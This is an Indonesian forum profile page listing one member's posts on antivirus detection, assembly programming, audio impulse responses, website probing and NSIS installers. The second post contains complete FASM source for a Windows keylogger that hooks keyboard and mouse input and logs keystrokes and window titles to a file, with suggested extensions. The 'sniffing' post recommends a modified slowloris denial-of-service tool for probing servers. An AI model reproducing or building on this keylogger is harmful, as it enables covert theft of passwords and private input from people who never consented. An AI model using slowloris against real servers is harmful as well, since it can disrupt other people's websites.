Perlihatkan Tulisan

Seksi ini mengijinkan Anda untuk melihat semua tulisan yang dibuat oleh anggota ini. Catatan bahwa Anda hanya bisa melihat tulisan yang dibuat dalam area di mana Anda memiliki akses terhadapnya.


Topik - descrates

Halaman: [1] 2 3 ... 17
1
Teknologi Antivirus / Virus berupa driver kernel ring 0 di Windows 10
« pada: Oktober 02, 2017, 06:55:21 AM »
ada tiga cara dasar

1. lewat signature
2. lewat hooking
3. lewat heuristic

pertama lewat signature, sebenarnya ini paling susah
karena vendor AV harus dapat file-nya dulu
kedua lewat hooking, nah kalo ini sebenarnya mudah
ketiga lewat heuristic, nah kalo ini mayan mumet

btw kadang bikin gw makin penasaran (karena ada yang tanyain)
serius "masalahnya" kalo kernel ring 0, driver only (with dropper), win10 & digitally signed
kebanyakan yang digitally signed diskip apalagi win10 rada beda (katanya)
kalo hooking API heuristic yang inside di ntoskrnl? apa masih bisa?

misalnya lagi, virus detek ketikan kita ketika mau diinterupsi
kita mau ngetik ini = sc stop virusdriver
tapi karena tahu, maka virus nambahin jadi gini = sc stop virusdriberrrr

LOL

2
Programming / [FASM] Keylogger for Windows
« pada: Oktober 01, 2017, 09:13:46 PM »
keylogger unicode versi basic, lol
banyak sih varian yang diposting sama orang (diilangin sebagian fungsinya termasuk yang ini juga)
tapi yang ini rada gw komplitin dikitlah
tapi intinya sih ini kaylogger asli nggak guna di kehidupan nyata
secara langsung disikat sama AV

btw, sebenarnya ada bagian-bagian quiz

1. KeyEventMouse, nah buat yang mau belajar bisa include mouse position
2. log_file, nah buat yang mau belajar bisa divariasi, misal localtime
3. ini memakai "C-like" standar IF.inc bukan SWITCH.inc jadi ya rada ambigu
4. cari sendiri

selamat belajar

Kode: [Pilih]

  format PE GUI 5.0       ; Subsystem Version (min Windows 2000)
 
;   =========================================================
    section '.code' code import writeable readable executable
;   =========================================================
 
    include 'win32wxp.inc'
    include 'IF.inc'


 
;   =====================
    include 'iat.imports'
;   =====================
 
 
    FILE_APPEND_DATA = 0x0004
 
struct KBDLLHOOKSTRUCT
    vkCode          rd 1
    scanCode        rd 1
    flags           rd 1
    time            rd 1
    dwExtraInfo     rd 1
ends
 
 
proc WriteToFile uses esi, wText
    locals
        dwBytesWritten      rd 1
        hFile               rd 1
    endl

    invoke CreateFileW, log_file, FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
    .if eax <> INVALID_HANDLE_VALUE
        mov [hFile], eax
        invoke lstrlenW, [wText]
        imul eax, 2
        invoke WriteFile, [hFile], [wText], eax, addr dwBytesWritten, NULL
        .if eax = 1
            invoke CloseHandle, [hFile]
            xor eax, eax
            inc eax
            ret
        .endif
    .endif
 
    xor eax, eax
    ret
endp
 
proc KeyEventMouse uses esi, nCode, wParam, lParam
    locals
        window_text         du 1024     dup (?)
        old_window_text     du 1024     dup (?)
        wszAppName          du 1024     dup (?)
        hWindowHandle       rd 1
    endl
 
    .if (([nCode] = HC_ACTION) & (([wParam] = WM_MOUSEFIRST) | ([wParam] = WM_MOUSELAST)))

        invoke GetForegroundWindow
        .if eax <> NULL
            mov [hWindowHandle], eax
            invoke GetWindowTextW, [hWindowHandle], addr window_text, 1024
            .if eax <> 0
                invoke lstrcmpW, addr window_text, addr old_window_text
                .if eax <> 0                 
                    invoke GetLocalTime, LocalTime
 
                    movzx eax, word[LocalTime.wSecond]
                    push eax
 
                    movzx eax, word[LocalTime.wMinute]
                    push eax
 
                    movzx eax, word[LocalTime.wHour]
                    push eax
 
                    movzx eax, word[LocalTime.wYear]
                    push eax
 
                    movzx eax, word[LocalTime.wMonth]
                    push eax
 
                    movzx eax, word[LocalTime.wDay]
                    push eax
 
                    cinvoke wsprintfW, addr wszAppName, tittleFrmt, addr window_text
                    stdcall WriteToFile, addr wszAppName
                    .if eax = 1
                        invoke lstrcpyW, addr old_window_text, addr window_text
                    .endif
                .endif
            .endif

; dummy
        .endif
    .endif

next1:
    invoke CallNextHookEx, [hKeyHook], [nCode], [wParam], [lParam]
    ret
endp


proc KeyEvent uses esi, nCode, wParam, lParam
    locals
        window_text         du 1024     dup (?)
        old_window_text     du 1024     dup (?)
        wszAppName          du 1024     dup (?)
        szKey               du 256      dup (?)
        buff                du 256      dup (?)
        UniChar             du 16       dup (?)
        hWindowHandle       rd 1
        dwMsg               rd 1
        dwProcessId         rd 1
    endl
 
    .if (([nCode] = HC_ACTION) & (([wParam] = WM_SYSKEYDOWN) | ([wParam] = WM_KEYDOWN)))

        mov esi, [lParam]
        virtual at esi
            kbHook KBDLLHOOKSTRUCT <>
        end virtual
 
        mov eax, [kbHook.flags]
        shl eax, 0x8
        add eax, [kbHook.scanCode]
        shl eax, 0x10
        inc eax
        invoke GetKeyNameTextW, eax, addr szKey, 256

        invoke GetForegroundWindow
        .if eax <> NULL
            mov [hWindowHandle], eax
            invoke GetWindowTextW, [hWindowHandle], addr window_text, 1024
            .if eax <> 0
                invoke lstrcmpW, addr window_text, addr old_window_text
                .if eax <> 0                 
                    invoke GetLocalTime, LocalTime
 
                    movzx eax, word[LocalTime.wSecond]
                    push eax
 
                    movzx eax, word[LocalTime.wMinute]
                    push eax
 
                    movzx eax, word[LocalTime.wHour]
                    push eax
 
                    movzx eax, word[LocalTime.wYear]
                    push eax
 
                    movzx eax, word[LocalTime.wMonth]
                    push eax
 
                    movzx eax, word[LocalTime.wDay]
                    push eax
 
                    cinvoke wsprintfW, addr wszAppName, tittleFrmt, addr window_text
                    stdcall WriteToFile, addr wszAppName
                    .if eax = 1
                        invoke lstrcpyW, addr old_window_text, addr window_text
                    .endif
                .endif
 
            .endif

            invoke GetKeyState, VK_LCONTROL
            mov ecx, 32768
            test cx, ax
            je @f
                .if [kbHook.vkCode] <> VK_LCONTROL
                    cinvoke wsprintfW, addr buff, sfrmtLcontrol, addr szKey
                    stdcall WriteToFile, addr buff
                    jmp next
                .endif
        @@: invoke GetKeyState, VK_RCONTROL
            mov ecx, 32768
            test cx, ax
            je @f
                .if [kbHook.vkCode] <> VK_RCONTROL
                    cinvoke wsprintfW, addr buff, sfrmtRcontrol, addr szKey
                    stdcall WriteToFile, addr buff
                    jmp next
                .endif
        @@: invoke GetKeyState, VK_LMENU
            mov ecx, 32768
            test cx, ax
            je @f
                .if [kbHook.vkCode] <> VK_LMENU
                    cinvoke wsprintfW, addr buff, sfrmtLmenu, addr szKey
                    stdcall WriteToFile, addr buff
                    jmp next
                .endif
        @@: invoke GetKeyState, VK_RMENU
            mov ecx, 32768
            test cx, ax
            je @f
                .if [kbHook.vkCode] <> VK_RMENU
                    cinvoke wsprintfW, addr buff, sfrmtRmenu, addr szKey
                    stdcall WriteToFile, addr buff
                    jmp next
                .endif
        @@: invoke GetKeyState, VK_LWIN
            mov ecx, 32768
            test cx, ax
            je @f
                .if [kbHook.vkCode] <> VK_LWIN
                    cinvoke wsprintfW, addr buff, sfrmtLwin, addr szKey
                    stdcall WriteToFile, addr buff
                    jmp next
                .endif
        @@: invoke GetKeyState, VK_RWIN
            mov ecx, 32768
            test cx, ax
            je @f
                .if [kbHook.vkCode] <> VK_RWIN
                    cinvoke wsprintfW, addr buff, sfrmtRwin, addr szKey
                    stdcall WriteToFile, addr buff
                    jmp next
                .endif

        @@:  .if [kbHook.vkCode] = VK_BACK
                    stdcall WriteToFile, sBackspace

                    .elseif [kbHook.vkCode] = VK_TAB
                    stdcall WriteToFile, sTab

                    .elseif [kbHook.vkCode] = VK_RETURN
                    stdcall WriteToFile, sEnter

                    .elseif [kbHook.vkCode] = VK_PAUSE
                    stdcall WriteToFile, sPause

                    .elseif [kbHook.vkCode] = VK_CAPITAL
                    stdcall WriteToFile, sCapsLock

                    .elseif [kbHook.vkCode] = VK_ESCAPE
                    stdcall WriteToFile, sEsc

                    .elseif [kbHook.vkCode] = VK_PRIOR
                    stdcall WriteToFile, sPageUp

                    .elseif [kbHook.vkCode] = VK_NEXT
                    stdcall WriteToFile, sPageDown

                    .elseif [kbHook.vkCode] = VK_END
                    stdcall WriteToFile, sEnd

                    .elseif [kbHook.vkCode] = VK_HOME
                    stdcall WriteToFile, sHome

                    .elseif [kbHook.vkCode] = VK_LEFT
                    stdcall WriteToFile, sLeft

                    .elseif [kbHook.vkCode] = VK_UP
                    stdcall WriteToFile, sUp

                    .elseif [kbHook.vkCode] = VK_RIGHT
                    stdcall WriteToFile, sRight

                    .elseif [kbHook.vkCode] = VK_DOWN
                    stdcall WriteToFile, sDown

                    .elseif [kbHook.vkCode] = VK_SNAPSHOT
                    stdcall WriteToFile, sPrintScreen

                    .elseif [kbHook.vkCode] = VK_INSERT
                    stdcall WriteToFile, sIns

                    .elseif [kbHook.vkCode] = VK_DELETE
                    stdcall WriteToFile, sDel

                    .elseif [kbHook.vkCode] = VK_F1
                    stdcall WriteToFile, sF1

                    .elseif [kbHook.vkCode] = VK_F2
                    stdcall WriteToFile, sF2

                    .elseif [kbHook.vkCode] = VK_F3
                    stdcall WriteToFile, sF3

                    .elseif [kbHook.vkCode] = VK_F4
                    stdcall WriteToFile, sF4

                    .elseif [kbHook.vkCode] = VK_F5
                    stdcall WriteToFile, sF5

                    .elseif [kbHook.vkCode] = VK_F6
                    stdcall WriteToFile, sF6

                    .elseif [kbHook.vkCode] = VK_F7
                    stdcall WriteToFile, sF7

                    .elseif [kbHook.vkCode] = VK_F8
                    stdcall WriteToFile, sF8

                    .elseif [kbHook.vkCode] = VK_F9
                    stdcall WriteToFile, sF9

                    .elseif [kbHook.vkCode] = VK_F10
                    stdcall WriteToFile, sF10

                    .elseif [kbHook.vkCode] = VK_F11
                    stdcall WriteToFile, sF11

                    .elseif [kbHook.vkCode] = VK_F12
                    stdcall WriteToFile, sF12

                    .elseif [kbHook.vkCode] = VK_NUMLOCK
                    stdcall WriteToFile, sNumLock

                    .elseif [kbHook.vkCode] = VK_SCROLL
                    stdcall WriteToFile, sScrollLock

                    .elseif [kbHook.vkCode] = VK_APPS
                    stdcall WriteToFile, sApplications


                .else
                    invoke VirtualAlloc, 0, 256, MEM_COMMIT, PAGE_EXECUTE_READWRITE
                    mov edi, eax
 
                    invoke GetKeyboardState, edi
                    .if eax <> 0
                        invoke GetKeyState, VK_SHIFT
                        mov [edi + VK_SHIFT], al
 
                        invoke GetKeyState, VK_CAPITAL
                        mov [edi + VK_CAPITAL], al
 
                        invoke GetForegroundWindow
                        invoke GetWindowThreadProcessId, eax, addr dwProcessId
                        invoke GetKeyboardLayout, eax
 
                        invoke ToUnicodeEx, [kbHook.vkCode], [kbHook.scanCode], edi, addr UniChar, 16, [kbHook.flags], eax
                        stdcall WriteToFile, addr UniChar
                    .endif
 
                    invoke VirtualFree, edi, 0, MEM_RELEASE

            .endif
        .endif
    .endif
 
 
next:
    invoke CallNextHookEx, [hKeyHook], [nCode], [wParam], [lParam]
    ret
endp

proc KeyLogger uses edi, lpParameter
    locals
        msg         MSG
    endl
 
    invoke GetModuleHandleA, NULL
    test eax, eax
    jne @f
 
    invoke LoadLibraryA, [lpParameter]
    test eax, eax
    jne @f
    inc eax
    jmp exit

@@: invoke SetWindowsHookExA, WH_KEYBOARD_LL, KeyEvent, eax, NULL
    mov [hKeyHook], eax

    invoke GetModuleHandleA, NULL
    test eax, eax
    jne @f
 
    invoke LoadLibraryA, [lpParameter]
    test eax, eax
    jne @f
    inc eax
    jmp exit

@@: invoke SetWindowsHookExA, WH_MOUSE_LL, KeyEventMouse, eax, NULL
    mov [hKeyHook], eax

@@: invoke GetMessageA, addr msg, 0, 0, 0
    test eax, eax
    je exit
    invoke TranslateMessage, addr msg
    invoke DispatchMessageA, addr msg
    jmp @b
 
    invoke UnhookWindowsHookEx, addr hKeyHook
    xor eax, eax
exit:
    ret
endp



;   =========================================================
;           ENTRY POINT
;   =========================================================
entry $
 
    invoke CreateThread, NULL, NULL, KeyLogger, NULL, NULL, dwThread
    test eax, eax
    je @f
 
    invoke WaitForSingleObject, eax, -1
    jmp Exit
 
@@: xor eax, eax
    inc eax
Exit:
    ret
 
    tittleFrmt              du 10, 10, '[%s] - %02d/%02d/%04d, %02d:%02d:%02d', 10, 0
    log_file                du 'log_file.txt',      0
     
    sfrmtLcontrol           du '[CtrlL + %s]',      0
    sfrmtRcontrol           du '[CtrlR + %s]',      0
    sfrmtLmenu              du '[AltL + %s]',       0
    sfrmtRmenu              du '[AltR + %s]',       0
    sfrmtLwin               du '[WinL + %s]',       0
    sfrmtRwin               du '[WinR + %s]',       0
 
    sBackspace              du '[Backspace]',       0
    sTab                    du '[Tab]',             0
    sEnter                  du '[Enter]', 10,       0
    sPause                  du '[Pause]',           0
    sCapsLock               du '[Caps Lock]',       0
    sEsc                    du '[Esc]',             0
    sPageUp                 du '[Page Up]',         0
    sPageDown               du '[Page Down]',       0
    sEnd                    du '[End]',             0
    sHome                   du '[Home]',            0
    sLeft                   du '[Left]',            0
    sUp                     du '[Up]',              0
    sRight                  du '[Right]',           0
    sDown                   du '[Down]',            0
    sPrintScreen            du '[Print Screen]',    0
    sIns                    du '[Ins]',             0
    sDel                    du '[Del]',             0
    sF1                     du '[F1]',              0
    sF2                     du '[F2]',              0
    sF3                     du '[F3]',              0
    sF4                     du '[F4]',              0
    sF5                     du '[F5]',              0
    sF6                     du '[F6]',              0
    sF7                     du '[F7]',              0
    sF8                     du '[F8]',              0
    sF9                     du '[F9]',              0
    sF10                    du '[F10]',             0
    sF11                    du '[F11]',             0
    sF12                    du '[F12]',             0
    sNumLock                du '[Num Lock]',        0
    sScrollLock             du '[Scroll Lock]',     0
    sApplications           du '[Applications]',    0
 
    LocalTime               SYSTEMTIME <>
    dwThread                rd 1
    hKeyHook                rd 1



IAT.imports

Kode: [Pilih]
;   =========================================================
;           IAT
;   =========================================================
library user32, 'USER32.dll',\
        kernel32, 'KERNEL32.dll'

import  user32,\
        ToUnicodeEx, 'ToUnicodeEx',\
        GetWindowThreadProcessId, 'GetWindowThreadProcessId',\
        UnhookWindowsHookEx, 'UnhookWindowsHookEx',\
        DispatchMessageA, 'DispatchMessageA',\
        SetWindowsHookExA, 'SetWindowsHookExA',\
        GetKeyboardLayout, 'GetKeyboardLayout',\
        GetForegroundWindow, 'GetForegroundWindow',\
        GetKeyboardState, 'GetKeyboardState',\
        TranslateMessage, 'TranslateMessage',\
        CallNextHookEx, 'CallNextHookEx',\
        GetKeyState, 'GetKeyState',\
        GetMessageA, 'GetMessageA',\
        wsprintfA, 'wsprintfA',\
        GetKeyNameTextW, 'GetKeyNameTextW',\
        GetWindowTextW, 'GetWindowTextW',\
        wsprintfW, 'wsprintfW'

import  kernel32,\
        OutputDebugStringA, 'OutputDebugStringA',\
        OutputDebugStringW, 'OutputDebugStringW',\
        VirtualFree, 'VirtualFree',\
        VirtualAlloc, 'VirtualAlloc',\
        LoadLibraryA, 'LoadLibraryA',\
        GetModuleHandleA, 'GetModuleHandleA',\
        CreateThread, 'CreateThread',\
        WaitForSingleObject, 'WaitForSingleObject',\
        CreateFileW, 'CreateFileW',\
        WriteFile, 'WriteFile',\
        CloseHandle, 'CloseHandle',\
        lstrlenW, 'lstrlenW',\
        lstrcmpW, 'lstrcmpW',\
        GetLocalTime, 'GetLocalTime',\
        lstrcpyW, 'lstrcpyW'
               


3
Programming / RosAsm yang terpinggirkan
« pada: September 29, 2017, 06:08:39 AM »
mungkin ada yang pernah denger?
salah satu assembler x86 yang lumayan bagus menurut gw
asli menurut gw
bukan dari language tapi dari susunan file yang dihasilkan
source code included, virus checker, dll
tapi ya jarang orang yang ngeh
dan sekarang entah kenapa ciri khas rosasm muncul di compiler branded

1. kalo dilihat dari struktur file, sangat maju
    pertama - API call
    kedua - resources
    ketiga - data
    keempat - code

2. ada disasm-nya, meskipun kurang power tapi work
    dan bagusnya bisa compile ulang, lol

kalo berkaca lagi sebenernya banyak kasus "language yang akhirnya mati"
di-bully karena emang nggak lazim tapi abis itu dipake, lol
gw inget kasus HLA http://en.wikipedia.org/wiki/High_Level_Assembly
pas jaman itu jadi tandem MASM ampe jungkir balik
tapi ya makin lama makin meredup
dan pas gw liat golang, eh ternyata ada HLA-nya (rewrite sih)

4
Aplikasi Mobile (Android iOS) / trik bikin Impulse Respons di iOS/Android
« pada: September 16, 2017, 06:14:14 AM »
suara nggak pernah bohong
kamu harus tahu spesifikasi soundcard-nya, biar pas buat implementasi
kamu ngga bisa bikin IRS overdosis

pertama-tama kamu harus ada basic cara bikinnya (gw pernah share)
kalo nyomot dari IRS base yang sudah ada pastikan good quality di ponsel
banyak yang beredar dari DTS, SRS, bla bla tapi pas dicobain di iOS/Android nggak nendang
karena yang bikin nggak ngeliat soundcard

next mau tweak sekelas dolby atmos bisa juga tapi pahami dulu gimana dolby atmos tercipta
abis itu implementasikan di IRS, gw jamin kualitas dolby atmos via IRS lebih baik
kenapa? karena kalau lewat IRS kita bisa set maximal

1. bikin base yang support clarity, kenapa clarity?
    hampir semua ponsel kualitas soundcard jelek di clarity, gw yakinlah
    karena vendor lebih menekan pada spek fungsi voice, hehehe
    kalo ini passed lanjut ke bass

2. bass, ini ada macem-macem paling banyak ya megabass alias ke arah power-nya
    satu yang good quality di sektor ini adalah samsung

3. vocal, sektor ini adalah sektor labil karena masing-masing vendor beda-beda
    beda region jualan beda setting, jadi mending jangan sentuh banyak-banyak
    yang rada good quality di sektor ini adalah LG (bawaan hardware)

4. environtment, ya macem-macem deh
    gw pake audacity, yang gampang aja, meskipun pake VST juga
    intinya buat ngeliat spectrum dalam desibel

5. panjang IRS, paling mentok 1 second lebih dikit

5
Aplikasi Mobile (Android iOS) / [Share] Impulse Respons for iOS/iPhone
« pada: September 11, 2017, 06:00:33 AM »
IRS kali ini spesifik untuk iPhone/iOS
pake iConvolver ya (bayar kalo ini)

fitur:
- only compatible with iOS/iPhone
- compatible with Philips Fidelio M2L
- 24 bits
- hyper clarity
- dynamic vocal
- dynamic bass
- more realistic live (thx to audacity)
- 20KHz cut off

http://www.mediafire.com/file/vy3l78eykm53jd6/Medium+Room+2+iPhone.wav

6
Programming / programmer dan realitasnya
« pada: September 03, 2017, 08:25:26 AM »
sesuai judul ya

1. programmer, developer = tipe yang kayak gini biasanya filosofinya "asal working nggak masalah"
2. programmer, hacker = kalo yang ini lebih luas dikit, karena bisa hacking
3. programmer, scientist = kalo yang ini biasanya ada risetnya
4. programmer, artist = ini biasanya suka bikin art
5. programmer, user = ini biasanya sebagai pengguna juga

kalo dijabarkan lagi juga agak susah, karena menyangkut experience yang digunakan
dulu gw pernah dapet meme, soal devel software, bentuknya berupa ayunan gitu
ada gap gitu, antara yang bikin dan pemakai, bahkan bisa jadi antar pemakai
misal gw bikin IRS, menurut gw udah best, tapi mungkin menurut yang lain belum best
gw padahal ngerti audio loh, nah di titik ini kadang terjadi pertentangan
dari sisi penilaian individu contoh lagi, opera vs chrome
untuk penggunaan sehari-hari opera terbukti lebih unggul tapi orang kebanyakan pakai chrome
apa developer opera lebih baik daripada developer chrome?
dari sini biasanya muncul second line opinion
toh biasanya kalau bikin apps mereka merekrut "semua jenis/macam programmer"
hacker, user, dll cuman kan nggak semuanya berhasil

solusinya?

7
Website + SEO / belajar sniffing website
« pada: Agustus 30, 2017, 05:49:54 PM »
ini cara gw, jaman dulu pake opera presto, enaknya on-board
cuman banyak website yang udah ganti teknologi
gw jadi switch, gunanya buat tahu aja

1. pake qupzilla 1.8.9 nah kita mundurin tanggalnya, baru browsing ke website
    ntar muncul warning kita only session, catet sslnya or proteksinya
    jangan-jangan cloudflare
    kenapa pake qupzilla?
    1. pake webkit, report ssl jadi mayan
    2. bisa nembus hsts
    3. lumayan aman dari malform

    cara ini lebih berguna buat reportase, sertifikat, error apa nggak

2. pake valyala/goloris, di modding ya, sebenernya ini buat snapshot doang
    misalnya servernya jenis cloudflare-nginx, apache, dll
    juga bisa buat sniff server kalau ada "patching"
   
    2017/08/30 17:27:29 Unexpected response read from server: [HTTP/1.1 200 OK
    Date: Wed, 30 Aug 2017 10:27:30 GMT
    Server: Apache/2.2.31 (Unix) mod_ssl/2.2.31 OpenSSL/1.0.1e-fips mod_bwlimited
    X-Powered-By: PHP/5.4.45
    Keep-Alive: timeout=1, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html
    (dari data server bisa dilihat, website sudah menerapkan anti-slowloris)

    atau mungkin Server: nginx/1.4.6 (Ubuntu) tapi di website tertulis nginx 1.9.3
    banyak kemungkinan, terus bermacam-macam status 405, 503, dll
    seberapa mampu nampung koneksi per detik per menit
    dropping berapa detik, dll

3. pake web-sniffer atau www.serversniff.net atau wireshark
    ini buat meyakinkan aja sih

4. pake chromium inspect element/network
    cukup powerfull untuk saat ini

5. beragam skrip PHP, python, perl, dll (cari aja di github)

8
Bug, Kritik, Saran / [Ask] File Reputation
« pada: Agustus 05, 2017, 10:22:24 AM »
btw tanya nih mumpung ada waktu, gegara kemaren SAP punya salah satu BUMN meleduk
(ya gw nggak kena dampak, cuman kasian yang ngelembur maintenis)

pas fitur file reputation, pas gw nyobain openoffice kok no user ya?
ya emang sih versi lawas yang ngga ada sertifikatnya
berarti kalo cuman sporadis dipakainya kan mungkin gw aja yang pakai

secara 1000 user = 90% terus yang 100 user = 80%



9
Programming / [NSIS] MultiUser patching
« pada: Juli 20, 2017, 07:05:40 AM »
gunanya biar multiuser.nsh bisa menampilkan username & nama komputer kita
win2000 ke atas, simpel tapi berguna

di bagian ini


!macro MULTIUSER_FUNCTION_INSTALLMODEPAGE PRE LEAVE

  ;Page functions of Modern UI page

  Function "${PRE}"
 
    ${ifnot} ${IsNT}
      Abort
    ${endif}
 
    ${if} $MultiUser.Privileges != "Power"
      ${andif} $MultiUser.Privileges != "Admin"
      Abort
    ${endif}
   
    !insertmacro MUI_PAGE_FUNCTION_CUSTOM PRE
    !insertmacro MUI_HEADER_TEXT_PAGE $(MULTIUSER_TEXT_INSTALLMODE_TITLE) $(MULTIUSER_TEXT_INSTALLMODE_SUBTITLE)
   
    nsDialogs::Create 1018
    Pop $MultiUser.InstallModePage

    ${NSD_CreateLabel} 0u 0u 300u 20u "${MULTIUSER_INSTALLMODEPAGE_TEXT_TOP}"
    Pop $MultiUser.InstallModePage.Text

;===============================================
    ReadRegStr $0 HKLM "System\CurrentControlSet\Control\ComputerName\ActiveComputerName" "ComputerName"
    StrCpy $1 $0 4 3

    ${NSD_CreateRadioButton} 20u 50u 280u 10u "${MULTIUSER_INSTALLMODEPAGE_TEXT_ALLUSERS} ($0)"
    Pop $MultiUser.InstallModePage.AllUsers

    System::Call "advapi32::GetUserName(t.r0,*i${NSIS_MAX_STRLEN})i"   

    ${NSD_CreateRadioButton} 20u 70u 280u 10u "${MULTIUSER_INSTALLMODEPAGE_TEXT_CURRENTUSER} ($0)"
    Pop $MultiUser.InstallModePage.CurrentUser
;===============================================

   
    ${if} $MultiUser.InstallMode == "AllUsers"
      SendMessage $MultiUser.InstallModePage.AllUsers ${BM_SETCHECK} ${BST_CHECKED} 0
    ${else}
      SendMessage $MultiUser.InstallModePage.CurrentUser ${BM_SETCHECK} ${BST_CHECKED} 0
    ${endif}
   
    !insertmacro MUI_PAGE_FUNCTION_CUSTOM SHOW
    nsDialogs::Show
   
  FunctionEnd

  Function "${LEAVE}"
     SendMessage $MultiUser.InstallModePage.AllUsers ${BM_GETCHECK} 0 0 $MultiUser.InstallModePage.ReturnValue
     
     ${if} $MultiUser.InstallModePage.ReturnValue = ${BST_CHECKED}
        Call MultiUser.InstallMode.AllUsers
     ${else}
        Call MultiUser.InstallMode.CurrentUser
     ${endif}
 
    !insertmacro MUI_PAGE_FUNCTION_CUSTOM LEAVE
  FunctionEnd

!macroend

10
Programming / Membuat "No Branding Text" di NSIS
« pada: Juli 15, 2017, 12:25:32 PM »
biasanya pakai ini

BrandingText " "

nah kalo gw gini

1. kita modif dulu file language .nlf
    cari string ini Nullsoft Install System %s
    rename sehingga jadi %s
    save

2. Kita binary edit, pake 16edit yang cepet
    cari string v2.51 (tergantung versi, kalo versi NSIS 3.01 ya v3.01)
    hexedit 0A 00 00 00 00 00
    save

3. selesai

Halaman: [1] 2 3 ... 17